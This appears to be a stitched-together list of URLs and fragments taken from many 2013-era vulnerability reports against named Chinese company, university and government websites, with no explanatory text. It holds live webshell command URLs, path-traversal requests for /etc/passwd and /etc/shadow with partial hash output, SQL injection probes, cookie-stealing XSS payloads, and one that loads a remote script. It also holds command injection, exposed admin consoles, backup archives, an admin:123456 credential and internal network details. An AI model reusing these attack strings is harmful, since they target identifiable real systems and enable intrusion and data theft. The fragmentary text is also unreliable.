http://dellcity.dell-brand.com/admin/ http://sws.ecare365.com http://sws.ecare365.com/a/pwn.jsp?cmd=id http://sws.ecare365.com/a/pwn.jsp?cmd=ifconfig http://learning.haier.com/ http://learning.haier.com/a/pwn.jsp?cmd=命令 http://learning.haier.com/status?full=true http://learning.haier.com/a/ http://learning.haier.com/a/pwn.jsp?cmd=whoami http://www.thankyou99.com/shop-list.php?type=2&id=11 http://218.58.70.145:8888/ http://218.58.70.145:8888/common/selmultiman.jsp?userGroup=2 http://218.58.70.143/security/loginInit.action http://www.aihuwai.net/wwwroot.rar http://www.aihuwai.net URL:http://zhi.pcpro.com.cn/forum/uc_server/admin.php http://web.sudu.cn/ http://web.sudu.cn/admin.php http://www.lz.chinanews.com/Newslist.aspx?ClassID=8 http://www.lz.chinanews.com/ShowToday.aspx?NewsID=5589 http://www.lz.chinanews.com/ShowEC.aspx?NewsID=5518 http://124.127.169.51 http://hyy.ah163.net/meeting/ http://class.ah163.net/meeting/ http://en.blossomhillinn.com/view/index.php?act=info&cid=32&tid=33 http://www.blossomhillinn.com/news/index.php?act=detail&nid=34 http://blossomhillinn.com/news/index.php?act=detail&nid=33 http://en.blossomhillinn.com/view/index.php?act=info&cid=32&tid=33 http://218.94.61.17/OnlineServer/LoginAction.action encap:Ethernet CB:15:4A:50 addr:192.168.4.180 Bcast:192.168.4.255 Mask:255.255.255.0 cbff:fe15:4a50/64 Scope:Link MTU:1500 packets:23055939 packets:12862125 txqueuelen:1000 http://218.58.70.161/ http://218.58.70.161/info/info.action http://et.airchina.com.cn/caapp/caapp/search_refundSearch.action?languageCode=zh_CN&reservationId=0017209457 http://www.kidoooer.com/wwwroot/ziyuan/other/ http://www.kidoooer.com/bbs/upload/forum.php http://www.kidoooer.com/bbs/Discuz_X3.0_SC_GBK-1/upload/install/这里可以重新安装 http://www.xwjy.cn/web-console/ http://www.xwjy.cn/jmx-console/ jdbc:hsqldb:${jboss.server.data.dir}${/}hypersonic${/}localDB jdbc:oracle:thin:@localhost:1521:orcl https://gdp.huaweisymantec.com/hwdgd/jsp/comm/loginproc.jsp https://gdp.huaweisymantec.com/hwdgd/jsp/comm/loginproc.jsp https://gdp.huaweisymantec.com/hwdgd/jsp/comm/login.jsp http://chuangyi.baidu.com http://bbs.aili.com http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://jiaoyou.58.com/usercenter http://126.am/****3 http://www.chineseall.cn http://www.exploit-db.com/exploits/28713/ http://218.58.70.201/ http://tvweb.letv.com/index http://123.125.89.225 http://96118.jl.gov.cn/Default.aspx http://www.wodebaoguo.com http://ips.11185.cn http://win.vjia.com/ http://210.72.11.64/nheicheck/login/login.action http://srv.sgcc.com.cn/statistics/index.php http://www.cepp.sgcc.com.cn/admin/left.aspx http://djhdj.gov.cn/news.php?type=class_2&sid=1&id=1 http://www.circ.gov.cn/dig/advsearch.action http://119.253.52.147/ShopCenter/ShopList/ShopList?ShopNameParam=aa http://www.xiaolan.gov.cn/news.php?id=19045 https://www.able9.com/ https://www.able9.com/smart/compindex https://www.able9.com/smartupload/files/company/2013-10-11/201310111326340461814.jsp http://www.cyhelp.org/index.php?m=admin inurl:web!getTitleGo.action http://www.cpigeon.com/Users/AssociationManage/ http://www.10010.com/的左侧导航中【常用功能】--【宽带测速】 http://www.halsign.com URL:http://www.enjoy3c.com/admin/login http://anchor.yingchuang.com/ http://anchor.yingchuang.com/consult/seminar/detial.asp?id=227 http://www.rsj.suzhou.gov.cn/web.rar http://xy.ue189.cn/memberIndex.action bt:/pentest/database/sqlmap# http://ideaclub.lenovo.com.cn/club/index.php?c=index&f=chkCity&m=store http://www.jyrjy.gov.cn/news/show.php?id=102 http://qc.homeinns.com/Login.aspx http://editorial.quanjing.com/featureshow.aspx?pid=6559 http://editorial.quanjing.com/catalog.aspx?pid=6382 http://editorial.quanjing.com/featureshow.aspx?pid=6559 http://editorial.quanjing.com/featureshow.aspx?pid=6559 http://w.qzone.qq.com/cgi-bin/likes/internal_dolike_app?g_tk=877422579 http://newyunying.xinnet.com/Default1.aspx http://newyunying.xinnet.com/DisposeServlet.aspx?InspectId=X131011009 http://shn.photo.qq.com/friendphoto/inqq http://www.thinkphp.cn/u/95959.html这个网址ID采集用户名,向全网发送垃圾信息后 http://www.mama.cn/q/}里面的任意话题回复或者发表话题都可以导致XSS http://open.lenovomm.com/ http://open.lenovomm.com/data/data.zip http://3g.happigo.com/webconfig.php.bak http://www.jxtii.com/productDetail.html?product_id=paidb2e62f108d93%27%20AnD%20%27a%27%3d%27a http://www.77.net/news_detail.php?id=4 http://editorial.quanjing.com/admin.aspx http://www.quanjing.com/motion/subject.aspx?id=482 http://quanjing.com/similarsearch.aspx?pic_id=blm026956 http://quanjing.com/motion/cat/default.aspx?id=103001 http://www.quanjing.com/motion/subject.aspx?id=482%20and%201=1 http://www.quanjing.com/motion/subject.aspx?id=482%20and%201=2 http://club.5sing.com/CTrend/988/156864 http://club.5sing.com/Detail/988/8130 http://club.5sing.com/CTrend/988/8130 https://www.able9.com/smartupload/upload/downLoadFile?filename=../../../../../../../../../../etc/passwd http://demo.51able.com/system/ http://www.eetop.com/index/login www.deadfake.com/Send.aspx http://docsys.sharp.cn:8006/dealer/system/login.jsp http://docsys.sharp.cn:8006/dealer/system/frame/left.html里有新闻管理,上传不限制,任意文件上传。 URL:http://www.lestorage.com/ http://www.lestorage.com/sql.php http://180.153.132.91/invoker/JMXInvokerServlet/ http://180.153.132.107/invoker/JMXInvokerServlet/ http://180.153.132.249/invoker/JMXInvokerServlet/ http://jianyi.sucop.com/thread/195.html?_=1381576331908 http://jianyi.sucop.com/admin/ http://219.153.32.161/ http://hi.baidu.com/huting/item/ea77c29727803f9e58146199 http://219.153.32.161/a/pwn.jsp?cmd=whoami http://219.153.32.161/a/pwn.jsp?cmd=ipconfig http://219.153.32.161/a/pwn.jsp?cmd=systeminfo http://219.153.32.161/a/pwn.jsp?cmd=dir http://passport.baihe.com/ http://hi.baidu.com/huting/item/ea77c29727803f9e58146199 exp:http://www.exploit-db.com/exploits/28713/ http://www.csice.org.cn/zxxx_info.jsp?zxid=14842: http://www.qdsn.gov.cn:88/cn/shell.aspx http://www.exploit-db.com/exploits/28713/ http://appwiz.lenovo.net http://runforfun.vanke.com/website.rar http://bbs.letv.com/index.php http://huan123.android.huan.tv/homeList.action http://www.ahtcedz.gov.cn http://4r.gmyok.com:8/login!toLogin.action http://www.xiangchi.com:99/login!toLogin.action http://www.inm.cc:88/login!toLogin.action http://4r.tycc.cn:9007/login!toLogin.action http://121.14.4.144:8080 http://www.jdxww.gov.cn/ http://www.jdxww.gov.cn/plus/mytag_js.php?aid=9090 http://www.fitchratings.com.cn/news_detail.php?id=4036 http://www.fitchratings.com.cn/news_detail.php?id=4036 http://z.yy.com/zone/index.do http://s3.guba.sina.com.cn/sina_guba/2013/10/13/image_201310130932331505797.html http://wap.e5618.com/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg http://wap.cgws.com/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg http://wap.ytzq.net/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg http://wap.gjzq.com.cn/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg http://wap.kysec.cn/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg http://m.sywg.com/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg http://hi.hexin.cn/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg http://wap.cnpsec.com/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg http://61.164.56.234/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg http://61.139.133.87/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg http://gdyd.10jqka.com.cn/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg http://mail.sina.com.cn/mobile/index.php http://km.wfj.com.cn/ http://www.exploit-db.com/exploits/28713/ http://wcba.hupu.com/players-7-000003 http://wcba.hupu.com/players-7-000003',显示错误 http://wcba.hupu.com/players-7-000003* http://shouyou.renren.com/ http://mail.189.cn/webmail/jsp/189misc/register/login.html http://wap.189.cn/reg/register.jsp http://wap.189.cn/wapmail http://tieba.baidu.com/bigscreen/fbs?tid=2642760579&offset=27&res_num=30 http://121.14.4.175/ http://121.14.4.175/crm/SystemMaintain/fuwuStart_show.ml http://121.14.4.175/upload/1.jsp http://tieba.baidu.com/game/index?tab=lottery http://opsii-test.koyoo.cn/index.show?actionMethod=init http://125.93.53.58 http://www.suning.com.cn/djgz/article.asp?id=14 http://www.suning.com.cn/djgz/article.asp?id=14 http://www.suning.com.cn/djgz/article.asp?id=14 http://www.ttschina.com.cn/site/ttschina/joinus_list.jspx http://www.yonyou.com.hk/new/enquiry.php?uid=1 http://www.yonyou.com.hk/new/download_view.php?uid=4 http://www.yonyou.com.hk/new/_inc_body_banner2.php?uid=92 http://www.yonyou.com.hk/new/support_view.php?uid=1 http://125.93.53.4/ http://www.stategrid.com.cn/cn/ http://219.232.246.252:8000 http://219.134.188.41:8080/Invoice/login.jsp site:jd.com了。 http://219.232.246.220:8000 http://125.93.53.9/ http://125.93.53.70:9998/ http://125.93.53.70:9998/a/pwn.jsp?cmd=ifconfig http://125.93.53.79/jmx-console/ http://125.93.53.79/ http://125.93.53.79:8080/csm_comm/page/login.jsp http://passport.hupu.com/sendpwd,post包"username=88952634&Input2=%E6%89%BE%E5%9B%9E%E5%AF%86%E7%A0%81&email=safe3q%40gmail.com http://passport.hupu.com/sendpwd www.sn12333.gov.cn http://sn12333.gov.cn/admin/ http://sbkfw.sn12333.gov.cn/user_tosbkonline.sn http://sbkfw.sn12333.gov.cn/ge.jsp http://ocr.eciq.cn/ http://ocr.eciq.cn/sysmanage/registryParse.jsp?parentid=0 http://bbs.hupu.com/robots.txt/a.php http://my.hupu.com/robots.txt/a.php http://youxi.hupu.com/static/gameIndex/js/common.js/a.php http://hunangtzy.com/comm_front/email/uploadImageFile_do.jsp?uri=/../../../ http://legend.7daysinn.cn/Legend/MyTradingList.aspx http://127.0.0.1/search.asp?id=2 http://landinfo.mlr.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Connector=http://landinfo.mlr.gov.cn/editor/filemanager/connectors http://124.127.255.43/ http://124.127.255.43/lxjweb/ http://124.127.255.43/a/pwn.jsp?cmd=id http://124.127.255.43/a/pwn.jsp?cmd=ifconfig http://**.**.**//pc.vigocam.com http://**.**.**/index.phpmenu=4&controller=faqs&action=content&pkid=138 http://www.ccidedu.com/ http://72ren.com/viewSchool.action http://125.93.53.82/oa/ http://125.93.53.82:7001/ http://cio.sasac.gov.cn/hy/1002-1377141505095/meetingUserLogin!genMeeting%20UserCheckCode.action?redirect:http://www.baidu.com http://yoyo.263.net/gift_goods_detail.php?gid=10121 http://blog.duobei.com/wp-admin/ android:name=".contentprovider.AccountProvider android:permission="com.renren.mobile.android.permission.PERMISSION_ADD_ACCOUNT android:authorities="com.renren.mobile.account android:name=".contentprovider.BaseProvider android:permission="com.renren.mobile.android.permission.PERMISSION_ADD_ACCOUNT android:authorities="com.renren.mobile.base android:protectionLevel="dangerous",这个不够,声明这个权限又能够读取到信息 android:name="com.renren.mobile.android.permission.PERMISSION_ADD_ACCOUNT android:protectionLevel="dangerous android:name="com.renren.mobile.android.permission.PERMISSION_ADD_ACCOUNT http://edp.nankai.edu.cn/search/index.php?imageField=&myord=uptime&myshownums=20&key=123 http://edp.nankai.edu.cn/down/html/?88'.html http://cts.nankai.edu.cn/news2.asp?ArticleID=1168 http://cj.nankai.edu.cn/search/?q=输入关键词&type=135 http://mta.nankai.edu.cn/news_list.php?mParendid=5&mname=培养方案&mid=21 http://teda.nankai.edu.cn/nku/ShowID.asp?id=187 http://teda.nankai.edu.cn/showdjyd.asp?ClassID=51 http://sysaqk.nankai.edu.cn/shs/FCKeditor/editor/filemanager/upload/test.html http://sysaqk.nankai.edu.cn/shs/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://sysaqk.nankai.edu.cn/shs/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://rsc.nankai.edu.cn http://rsc.nankai.edu.cn/PhpMyAdmin/index.php FTP:192.168.8.32 http://cts.nankai.edu.cn/database/ http://wyxyjpk.nankai.edu.cn/bbs/data/ http://ygb.nankai.edu.cn/xsj/z.asp http://www.elinkhost.com/plugins/newalipay/query_trade.php?oid=--1381742418 http://www.gaoyou.gov.cn/zfxxgk/gkml_nr.php?id=2759 http://dev.tudou.com/v5/showcase.php?id=24 http://ids.gzstats.gov.cn/ids/admin/debug/env.jsp http://ids.gzstats.gov.cn/ids/admin/debug/fv.jsp?f=/../../../../../../../etc/passwd http://sso.sz.gov.cn/ids/admin/debug/env.jsp http://sso.sz.gov.cn/ids/admin/debug/fv.jsp www.ctyun.cn www.dongfeng-honda.com/honda_mediaReport.php?nid=604 http://ids.hebei.com.cn/ids/admin/debug/fv.jsp?f=/../../../../../../etc/shadow http://ids.hebei.com.cn/ids/admin/debug/env.jsp http://124.128.48.211:8080/GPSMonitor/index.jsp http://dzb.hasee.com/service/showlist.asp?cat_id=6 http://www.bjpc.gov.cn/ids/admin/debug/fv.jsp?f=%5Cweb.xml http://www.bjpc.gov.cn/ids/admin/debug/env.jsp http://ids.people.com.cn/ids/admin/debug/env.jsp http://ids.people.com.cn/ids/admin/debug/fv.jsp?f=/../../../../../../../../etc/shadow http://qk.cass.cn/ids/admin/debug/fv.jsp?f=/../../../../../../../../../etc/shadow http://qk.cass.cn/ids/admin/debug/env.jsp http://res.byd.cn/StorageModelM/login.action HellentekiMacBook-Pro:tools HellentekiMacBook-Pro:tools http://www.cnss.cn/trsids/admin/debug/env.jsp http://www.cnss.cn/trsids/admin/debug/fv.jsp?f=%5C..%5Cadmin%5Clogin.jsp http://wls.iphy.ac.cn/zhongyi/news_detail.php?id=35 http://passport.vodone.com/ids/admin/debug/fv.jsp?f=/../../../../../../../../etc/shadow http://passport.vodone.com/ids/admin/debug/env.jsp http://gongyi.wanmei.com/e/action/ListInfo/index.php?classid=60&category=48 http://enkj.com/include/upfile_head_img_src.asp?formname=form1&editname=head_img_src&uppath=UploadFiles http://222.74.37.246/ping.cgi http://222.74.37.246/ping.cgi http://www.spdns.com/Host/hostmore.asp?type=1 http://114.134.80.147/ http://114.134.80.147/admin/test/logs ftp://116.204.96.186/ http://www.yto.net.cn/[马赛克].rar http://www.yto.net.cn/[马赛克].rar http://www.amazon.cn/registry/wishlist/ http://cover.carrefour.com.cn/babys.jsp?babyId=44 http://dp.ha.xinhuanet.com/MessageManager/QueryMessageJoinNum.aspx?ID=98 http://dp.ha.xinhuanet.com/MessageManager/QueryMessageJoinNum.aspx?ID=98 http://servicenet.csvw.com/resource/Photo/2/285960.asp http://www.zbintel.com/knowledge/knowledge_2.asp?A2=17 http://115.182.51.59:8080/redmine/projects/our-wiki处找到几个用户 http://oa.letv.com/ ftp://putuoshan.gov.cn/PT/Business/putuoshan/ http://mp.weixin.qq.com/mp/appmsg/show?__biz=MjM5NTUzMzMwMQ%3D%3D&appmsgid=10000142&itemidx=1&sign=62921fe68417e917f9ab668b83995a41&scene=3#wechat_redirect http://www.ccard.net.cn/ http://newtest.lashou.com/.svn/entries http://sptest.test.lashou.com/.svn/entries http://houtai.test.lashou.com/.svn/entries http://gms.gfan.com/system/page/login.jsp http://cnhonkerarmy.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u006f\u006f\u006b\u0069\u0065\u0029\u003e/1.swf https://pim.suning.com/ http://61.132.255.208:15400/admin/ www.qq.com http://www.360gree.com/wwwroot.rar http://www.360gree.com/admin/Index.aspx http://www.ahly.gov.cn/hdcy/zxzx_show.jsp?ID=43 http://shoucang.dahe.cn/nlist.php?cid=40 URL:http://ideaclub.and-c.com/forum/admin.php http://go.163.com/2013/0927/lenovo/index.php.bak http://go.163.com/2013/0927/lenovo/user.txt http://ip/uias/login.jsp http://ip/uias/logon.action就进入后台了 http://www.jiaoshi.com.cn/main/highpayjobs.php?j=1228 http://www.jiaoshi.com.cn/main/highpayjobs.php?j http://sqlmap.org http://www.actonchina.com/news_info.aspx?id=406 inurl:news.asp?DHID= http://121.207.242.90/config/db.cfg.php http://121.207.242.64/config/db.cfg.php http://121.207.242.58/config/db.cfg.php http://cdn.market.hiapk.com/login.php http://cdn.market.hiapk.com/config/db.cfg.php http://www.sjd-logistics.com:8000/ http://www.sjd-logistics.com http://www.19lou.com/thread/category/structure/publish?fid=1637&modelId=10001】,在title中插入 http://www.zzqxw.gov.cn/work/Backstage/Login.aspx http://www.hf12345.gov.cn/Report-ResultAction.do?reportId=fc081f7f-cce8-4fa1-8518-b498476ea9c3&newReport=true&subjectId=47ac981594614fe6b7480fe88c6d5fc7 https://uniportal.huawei.com/accounts/register.do?method=toRegister&appurl=http%3A%2F%2Fforum.huawei.com%2Fjive4%2Findex.jspa&nls=zh http://203.208.46.145/#newwindow=1&q=intitle:trs身份&start=60 http://203.208.46.145/#newwindow=1&q=intitle:trs+inurl:ids&start=20 http://www.baidu.com/s?tn=baiduhome_pg&ie=utf-8&bs=intitle%3Atrs+ids&f=8&rsv_bp=1&rsv_spt=1&wd=intitle%3Atrs+ids+inurl%3Aids&rsv_sug3=8&rsv_sug4=369&rsv_sug1=4&inputT=2568 http://www.axsj.net http://www.axsj.net/AX_Product/SearchProductList.html?kw_forIndex=aaaaaaaaa http://bbs.lvmama.com/plugin.php?id=sosv_award:main&acid=2 http://www.zhhrss.gov.cn/SearchList.aspx?zhi=&pageindex=2 URL:http://sl.huatu.com/shladmin/login.php‘ http://124.205.22.105/test.jsp http://124.205.22.105/manage/flight/order/flightquery!getTicketInfoByPNR.action http://www.ctsmice.com/aboutCts.action http://www.ctsmice.com/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://www.sutenw.com/show.asp?Id=364 http://www.cnctc.cn:88/jmx-console/ http://www.cnctc.cn:88/-console/ http://erp.cnctc.cn:8088/web-console/ http://erp.cnctc.cn:8088/jmx-console/ http://avata.sdo.com/home.php?mod=space&uid=20129748&do=blog&quickforward=1&id=1257 http://club.suning.com/home.php?mod=space&uid=4085278&do=blog&quickforward=1&id=1044510 http://125.93.53.89:8088/eshow/index.php?r=site/login http://pub.ada.gov.cn:8001/inquiry/inquiryquestionWeb.jsp?strWebSite=31 http://pub.ada.gov.cn:8001//inquiry/inquiryquestionWebView.jsp?strQuestionId=116980088203727 http://pub.ada.gov.cn:8001/inquiry/inquiryquestionWeb.jsp?strWebSite=31 http://pub.ada.gov.cn:8001//inquiry/inquiryquestionWebView.jsp?strQuestionId=116980088203727 http://newsletter.zhongliangwomai.com:8081/smartedm/welcome.do http://ktshop.tcl.com/ http://ktshop.tcl.com/downloadfile.do?docid=7553 http://bbs.amap.com/blog-13223-191.html http://bbs.jd.com/forum-attachment-aid-NTAyMzE4fGZjNGJmOTExfDEzODE5MDExNzh8MzczMTA5NA%3D%3D-request-1.php.html http://www.ahdca.org/old/disbbs.asp?id=234 http://www.weipai.com/user/4e626f71677c27fc24000000 http://en.kingdee.com/index.php?option=com_ninjarsssyndicator&feed_id=1&format=raw&catid=4 http://www.xwwb.com/web/wb2008/wb2008news.php?db=5&thisid=143962 http://you.joy.cn/Web.config.bak http://blog.cntv.cn/config.php.bak http://ebuy.avic.com/front/user-login.action http://ebuy.avic.com/shell.jsp encap:Ethernet AE:8B:21:FF:4A addr:10.64.2.105 Bcast:10.64.2.255 Mask:255.255.255.0 fe21:ff4a/64 Scope:Link MTU:1500 packets:19212807 packets:18512781 txqueuelen:1000 http://rdscm.midea.com.cn:7008/ http://58.252.101.32:8000/export/ http://www.19lou.com/thread/category/structure/search/result?m=10001&fid=1637&mf_1391=%22%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E// http://house.19lou.com/newhouse?houseType=%22%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E// http://www.dianwoba.com/supplier/restaurant!gtChainSupplierList.do http://www.dianwoba.com:8080/supplier/restaurant!gtChainSupplierList.do http://www.dianwoba.com/auth/login!sinaAuth.do http://www.dycgj.gov.cn/dydy/index.action http://ehr.lzlj.com.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&CurrentFolder=/../../&Type=File http://220.178.124.29/zhzyk/public/secondList.xp?ptreeid=0004&streeid=0001&treeid=00020003 http://global.midea.com.cn/midea/ http://global.midea.com.cn//midea/FileView?id=../../../../../../../../../../etc/shadow%00.jpg w1:15684:0:99999:7 J0i8zKZ9EnbiUzjHPegXh0:14125:0:99999:7 http://global.midea.com.cn//midea/FileView?id=../../../../../../../../../../etc/passwd%00.jpg http://reg.sun0769.com/login.action http://www.avic-wztj.com/front/user-login.action encap:Ethernet A4:BA:DB:18:4B:13 addr:172.16.2.19 Bcast:172.16.2.255 Mask:255.255.255.0 a6ba:dbff:fe18:4b13/64 Scope:Link MTU:1500 packets:1103420139 packets:7491152288 txqueuelen:1000 www.douguo.com http://www.chyip.gov.cn/userfiles/file/ http://www.chyip.gov.cn/userfiles/image/1.aspx http://mitv.tcl.com/DRP/login.action http://www.chjsj.gov.cn/ewebeditor/db/ewebeditor.mdb http://www.chjsj.gov.cn/admin/data/data.mdb http://www.chjsj.gov.cn/admin/admin_add.asp http://hb.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=0 http://cz.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=0 http://wh.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=0 http://bz.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=0 http://chz.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=0 http://xc.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=1 http://www.ahwh.gov.cn/zwgk/ListByDate.asp?sDate=2013 http://www.nsfocus.com/3_support/kb.php?product=NIDS http://support.nsfocus.com/kb.php?q=88952634 http://crm.fogrow.com admin:123456 www.hbgzw.gov.cn http://219.141.246.31:9000/webapp/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/../../ http://ktshop.tcl.com/ http://kdeas.kingdee.com/easWebClient/deploy/client/ctrlhome/client/KDNoteConfig.xml http://kdeas.kingdee.com/easWebClient/deploy http://cvn.test.kingdee.com http://123.103.23.10/lxjweb/ http://hrss.jiangxi.gov.cn/images.aspx http://blog.ifeng.com/article/30864350.html http://order.xiaomi.com/site/loginurl http://order.xiaomi.com/site/loginurl?followup=http://requestb.in/1kd0b981?.xiaomi.com https://account.xiaomi.com/pass/serviceLogin?callback=http%3A%2F%2Forder.xiaomi.com%2Flogin%2Fcallback%3Ffollowup%3Dhttp%253A%252F%252Frequestb.in%252F1kd0b981%253F.xiaomi.com%26sign%3DMWFiNDVhOGNiNWUyYWE3NjMxNDFiYjA3MzE0Yjc1Zjg0OWZiMjQ1Ng%2C%2C&sid=eshop http://order.xiaomi.com/site/loginurl?followup=http://www.xiaomi.com.example.com https://account.xiaomi.com/pass/serviceLogin?callback=http%3A%2F%2Forder.xiaomi.com%2Flogin%2Fcallback%3Ffollowup%3Dhttp%253A%252F%252Fwww.xiaomi.com.example.com%26sign%3DYTBjMDVhN2ZlYjg0OGQ3MWRiYTg3M2NmMTg3NzA5MDViYzkyMWNmYw%2C%2C&sid=eshop http://120.31.50.116:8080/mayi.website/web!index.action http://inforadar.trs.com.cn/jsp/util/file_download.jsp?filePath=c:%5Cboot.ini%00.xml http://203.208.46.145/#newwindow=1&q=intitle:trs+inurl:inforadar&start=10 http://203.208.46.145/#filter=0&newwindow=1&q=inurl:jsp/portalsearch http://www.baidu.com/s?wd=inurl%3Ainforadar&rsv_spt=1&issp=1&rsv_bp=0&ie=utf-8&tn=baiduhome_pg&rsv_sug3=13&rsv_sug=0&rsv_sug1=12&rsv_sug4=777 http://yiliao.kingdee.com http://yiliao.kingdee.com/admin/customerEdit.php?id=3&types=3 http://yiliao.kingdee.com/admin/customerEdit.php?id=3&types=3 http://www.court.gov.cn/qwfb/sfwj/yj/201309/552.html http://www.hnnjj.gov.cn/login_frame.jsp http://www.zhoukou.gov.cn/zk_xxgk/gkzn.jsp?id=1220597481203 http://www.zhoukou.gov.cn/board/anser_list.jsp?id=3451 http://www.zhoukou.gov.cn/shpy/shpy.jsp?id=26 http://zhoukou.gov.cn/yjzj/yjzj_xx.jsp?adid=bd1e5b493b4faa9c013b55ae56b90066 http://zhoukou.gov.cn/zk_xxgk/listdetail.jsp?artid=1220585391375&id=102001 http://www.haval.com.cn/haval_newslist.html http://www.haval.com.cn:80/ www.haval.com.cn http://www.youlin.com/.svn/entries trs:templateservicefacade www.cncotton.com soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/ xmlns:impl="http://impl.service.template.trs.com soapenv:Header/ soapenv:Body impl:writeSpecFile soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/ xsi:type="soapenc:base64Binary xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/ xsi:type="soapenc:string xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/ impl:writeSpecFile soapenv:Body soapenv:Envelope http://www9.vanke.com/main/Investor/register/savecontacts.asp?id=30762 http://zzjyt.haier.net/ZZJYT/login/index.jsp http://61.146.213.142//test.txt www.dopool.com http://dc.dopool.com/ http://dc.dopool.com/wp-admin/ http://csjszj.cn/test.txt http://chuang.yicai.com/forum/topic?forum_topic_id=140 http://www.aqcz.gov.cn/index.php?c=main&a=toCommonArticle&res=xqdt_article&id=90 http://www.hrbcb.gov.cn//test.txt http://www.yb315.com.cn/test.txt http://www.19yuedu.com/forum-27-1.html http://www.kingdee.com/experience/ http://218.85.73.166:8081/inforadar/jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd http://180.184.97.42/uploadfile/time/2013/ http://www.yisence.net/Sell/GetServerIp.aspx?id=2 inurl:infodetail/?infoid= URL:http://kabedm.lenovo.com.cn/link/ http://xzfw.wuhai.gov.cn/admin/ http://jiepang.com/ http://61.150.78.80//test.txt http://store.kingdee.com/event/11k3wise_xz/walls.php?event_id=2 http://open.kingdee.com/K3cloud/Democenter/ProductInfo.aspx?id=106653 http://dopool.com/web.zip备份下载 http://ht.ahta.com.cn/scenic/info.php?id=001 http://ht.ahta.com.cn/xinxi/info.php?id=110901054802 http://ht.ahta.com.cn/line/info.php?id=001 http://218.77.181.61:8001/LoginAction.action http://www.ahpress.gov.cn/sitecn/list.aspx?type=1441 http://www.ahpress.gov.cn/sitecn/search.aspx?title= http://user.kuaiwan.com/account/get_password/ http://user.kuaiwan.com/account/get_password/verify/?email=189837992@qq.com&verify=6205ed5cd3e4456a8b236ef4bddf731e http://web.kuaiwan.com/jifen/?from=web#top http://dyn.web.kuaiwan.com/JiFen/removeFriend/40431/?callback=jsonp1382005206571 http://www.ahjt.gov.cn/service/guestbook/Modify_GBook.asp?Id=4403 http://www.hnds.gov.cn/comm_front/tzzx/uploadImageFile_do.jsp?uri=/ http://www.hnds.gov.cn/cms/siteResource/uploadfiles/tzzx/下。 http://www.gxstd.com/default1.asp?autologin=1&pwd=1&uid=1 http://www.gxstd.com/default.asp?autologin=1&pwd=1&uid=1 http://search.lycos.co.kr/里面搜 http://www.airmacau.com.mo/about/news_articles.asp?id=208 http://www.airmacau.com.mo/test/ http://www.airmacau.com.mo/admin/ http://xzwwj.sach.gov.cn/news/newshow_help.aspx?newsid= http://www.soso.com/q?w=r%3C/script%3E%3Cxstyle%3E%3Cscript/src=http://www.radio1.co.tz/test.js%3E%3C/script%3E www.radio1.co.tz为注册的域名,这里我随便从网上找了一个co.tz的域名,然后本地host到127.0.0.1,test.js的内容为 http://msla.hz.letv.com/upload.jsp?action=upfile http://www.xiangtan.gov.cn/fileoper/sendfile.jsp?s_target=/,s_target是上传目录,/表示网站根目录。此处可以上传任意类型文件,通过上传jsp文件可getshell。 http://117.27.130.39 http://www.kingdee.com http://www.kingdee.com/hotNewsList.do?catalog=hmolPvBz*&curPage=1&days=1&topic=%D6%C6%D4%EC%D2%B5%CA%D0%B3%A1%D7%B7%D7%D9 http://www.wealink.com www.quanyouyg.com/index.php?m=Prod&a=index&pid=88 http://www.wooyun.org http://127.0.0.1/admin/skins/skins.php?ac=xgmb&path=../../skins/index/html/&name=aaa.php http://192.168.20.100/cgi-bin/backupsAdd.php?old_name=2013-10-17-234141.bak&name=2013-10-17-234141.bak http://192.168.20.100/cgi-bin/backupsAdd.php?old_name=2013-10-17-234141.bak&name=2013-10-17-234141.bak;ls%20-l http://ghml.csdb.cn/axis2-admin/ http://posims.yeepay.com/agent/register.action http://kt.tcl.com/ http://tclbjd.etwowin.com http://kt.tcl.com/ http://kt.tcl.com/ http://tp.dzwww.com/zhuanti/sdtyn/index.jsp?group=2 http://cw-info.shenzhenair.com/QMYS/Web/Login.aspx http://cw-info.shenzhenair.com/QMYS/Web/Login.aspx www.highso.org.cn http://admin.highso.cn/sys/backLogin!login.action 